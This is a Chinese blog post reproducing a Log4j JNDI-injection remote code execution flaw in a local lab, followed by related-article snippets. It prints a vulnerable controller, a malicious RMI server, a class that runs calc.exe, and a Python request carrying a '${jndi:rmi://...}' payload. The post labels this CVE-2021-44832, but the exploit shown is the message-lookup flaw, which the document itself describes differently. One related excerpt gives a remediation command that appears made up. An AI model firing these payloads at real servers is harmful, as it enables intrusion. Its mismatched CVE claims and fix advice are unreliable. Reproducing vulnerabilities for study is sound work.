Apache Log4j(CVE-2021-44832)远程代码执行漏洞复现

最新推荐文章于 2024-02-20 20:15:52 发布
最新推荐文章于 2024-02-20 20:15:52 发布
阅读量3.6k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43223153/article/details/122289856
版权

Apache Log4j(CVE-2021-44832)远程代码执行漏洞复现

1. 漏洞介绍:
Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。
Apache Log4j2 2.0-beta7 到 2.17.0版本存在安全漏洞,该漏洞源于软件中对于JDBC Appender 和JNDI 缺少有效的防护与过滤。有权修改日志配置文件的攻击者可以构建恶意配置 将 JDBC Appender 与引用 JNDI URI 的数据源一起使用,该 JNDI URI 可以执行远程代码。
2. 漏洞原理:
log4j是一款通用日志记录工具,开发人员可以使用log4j对当前程序状态进行记录。log4j的功能非常强大,开发人员除了直接记录文本外,还可以使用简单表达式记录动态内容,例如:

http://logger.info("system propety: ${sys:user.dir}");

简单表达式使用 ${} 进行包裹,上述示例中,sys:user.dir 表示使用sys解析器,查找user.dir的内容,即在系统环境变量中查找user.dir,以替换 ${sys:user.dir} 进行打印。
此外log4j还有很多其它类型的解析器,其中jndi解析器就是本次漏洞的源头
jndi 解析器将通过 jdk 获取 jndi 对象,并使用这个 jndi 对象替换原有文本进行打印。 我们将 jndi 对象理解成为一个从程序外部获取的 Java 程序对象就可以了。jdk中提供了多种不同 jndi 对象的获取方式,获取方式可以称为schema,所以正常的包含jndi的日志记录方式如下:

http://logger.info("system propety: ${jndi:schema://url}");

关于jndi注入具体原理可以看下这篇文章,这里我就不在详细介绍了。

https://security.tencent.com/index.php/blog/msg/131

3. 漏洞验证:

1、启动java项目:示例代码

package com.yy.app;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.*;

@RestController
@RequestMapping("/api")
public class SearchController {
    private static final Logger logger = LogManager.getLogger(SearchController.class);

    @RequestMapping(value = "/search", method = RequestMethod.GET)
    public String search(@RequestBody String keyWord) {
        logger.info("search requestParam:{}", keyWord);
        return "返回成功";
    }
}

在这里插入图片描述

2、启动搭建的攻击机的rmi环境,示例代码

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class HackService {

    public static void main(String[] args) {
        try {
            // 启动服务
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            // 创建资源
            Reference reference = new Reference("com.yy.hacker.HackText", "com.yy.hacker.HackText", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            // 绑定资源
            registry.bind("hack", referenceWrapper);
            System.out.println("服务初始化完成");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

import java.io.IOException;
public class HackText {
    static {
        try {
            /* open /System/Applications/Calculator.app*/
            /*打开计算器*/
            Runtime.getRuntime().exec("C:\\Windows\\System32\\calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

3、启动好两个服务后,模仿用户发起请求。示例代码

import requests

url = "http://127.0.0.1:8888/api/search"
parms = '"${jndi:rmi://127.0.0.1:9999/hack}"'
res = requests.get(url=url, data=parms)

在这里插入图片描述
在这里插入图片描述
也可以使用DNSlog来测试,测试方法:

  1. 在浏览器打开http://dnslog.cn/点击它获取一个域名
    在这里插入图片描述
    2.发起一个请求后,查看是否有解析到地址,如果有解析到IP地址那么说明是存在该漏洞
    在这里插入图片描述
    在这里插入图片描述
月光下的她很美
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
Apache Log4j2 远程代码执行漏洞CVE-2021-44832)分析资料
最新发布
xillianpeng的专栏
05-14 147
阿里云漏洞CVE-2021-44832 - Apache Log4j 2.17.0 Arbitrary Code Execution via JDBCAppender DataSource Element
log4j官方漏洞修复史(更新至2.17.1/CVE-2021-44832)
hldfight
12-23 1万+
0x00 前言 自从log4j2.14.1版本爆出漏洞后,官方截止目前为止,共发布了3个稳定版本,分别是15.0、16.0、17.0。 本篇文章就分析一下每个版本都做了哪些事情,以此来评估每个版本升级的必要性。 0x01 2.15.0版本 1.1 修复方案 此版本是为了修复最初的 CVE-2021-44228漏洞,它的修复方式总结如下: 1、默认禁用msg lookup功能 2、在org.apache.logging.log4j.core.net.JndiManager#lookup方法中限制了ldap服务
Apache Log4j 2修复漏洞CVE-2021-44832
平庸
12-30 992
Apache Log4j 2修复漏洞CVE-2021-44832
高性能日志框架 log4j 2 之 一
G探险者的博客
01-03 1609
前言 本文是自学log4j2 ,参考阿帕奇官网,对log4j2 的官方文档翻译 Apache Log4j 2 Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了重大改进,并提供了许多 Logback 中可用的改进,同时修复了 Logback 架构中的一些固有问题。 重要:安全漏洞 CVE-2021-44832 摘要:当攻击者控制配置时,Apache Log4j2 通过 JDBC Appender 容易受到 RCE 的攻击。 细节 Apache Log
Log4j RCE (CVE-2021-44228)】复现及原理分析
新青年1号
04-30 1245
Log4j 是 log for java 的简写,是 Apache 的开源日志记录组件。pox.xml中引入log4j依赖
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行
【渗透测试】log4j漏洞复现漏洞修复方案
Yb528970805的博客
09-16 1949
2021年12 月 10 日凌晨,Apache 开源项目 Log4j远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
log4j漏洞复现
Massimo__JAVA的博客
08-03 360
Log4j是由Apache提供的日志操作包,用于帮助用户处理日志信息。通过Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2641
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Log4j远程代码执行漏洞环境搭建及复现
m0_71263989的博客
02-20 1270
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 2714
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6406
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
Log4j2 远程代码执行漏洞复现
龙卷风摧毁停车场
12-20 3096
Log4j2.14前版本,漏洞浮现
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值